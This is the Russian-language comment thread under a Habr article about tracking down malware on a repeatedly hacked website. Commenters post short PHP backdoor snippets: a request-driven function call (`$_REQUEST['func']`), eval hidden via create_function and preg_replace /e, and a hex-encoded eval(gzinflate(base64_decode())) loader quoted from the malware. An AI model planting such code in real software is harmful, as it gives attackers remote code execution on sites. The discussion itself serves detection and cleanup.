Комментарии 14
НЛО прилетело и опубликовало эту надпись здесь
Учитывая что автор говносимволами назвал кодировку base64, можно предположить, что почта ему приходит по большей части в говне.
+19
Выражение добавлено не отвращения ради а юмора для :)
0
НЛО прилетело и опубликовало эту надпись здесь
НЛО прилетело и опубликовало эту надпись здесь
Поиск по eval может и не помочь, если сделать например, вот так:
Если не ошибаюсь, то до версии php 5.5 будет вполне работать
$text = 'echo "hello";';
$text = preg_replace(
'((.*))e',
'e' . 'v' . 'a' . 'l' . '("$1")',
$text
);
Если не ошибаюсь, то до версии php 5.5 будет вполне работать
+1
В самом простом случае закладка может выглядеть так:
Хотя в таком случае не будет работать eval. Но функция create_function позволяет обойти это ограничение:
Из обычной строки, которая может быть закодирована любым образом (или передана вместе с запросом), получается функция eval.
<? $_REQUEST['func']($_REQUEST['param'])
Хотя в таком случае не будет работать eval. Но функция create_function позволяет обойти это ограничение:
<? $eval = create_function('$a','eval($a);');
Из обычной строки, которая может быть закодирована любым образом (или передана вместе с запросом), получается функция eval.
0
Еще
create_function('$o', 'return ev'.'al($o);');
и overrride_function()+1
НЛО прилетело и опубликовало эту надпись здесь
> eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B");
> HEX символозаменители видны невооруженным взглядом. Превратить их в удобочитаемый невооруженным взглядом текст поможет любой HEX декодер, я пользовался этим.
Прям я сорву покровы сейчас: echo "\x65\x76...\x29\x3B"; выведет нам содержимое этой строки в читаемом виде так, как оно и будет передано в eval(). Иначе eval() не отработает же ж.
> HEX символозаменители видны невооруженным взглядом. Превратить их в удобочитаемый невооруженным взглядом текст поможет любой HEX декодер, я пользовался этим.
Прям я сорву покровы сейчас: echo "\x65\x76...\x29\x3B"; выведет нам содержимое этой строки в читаемом виде так, как оно и будет передано в eval(). Иначе eval() не отработает же ж.
+2
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Куда смотреть если сайт постоянно взламывают, или как я отлавливал зловреда на сайте одного из клиентов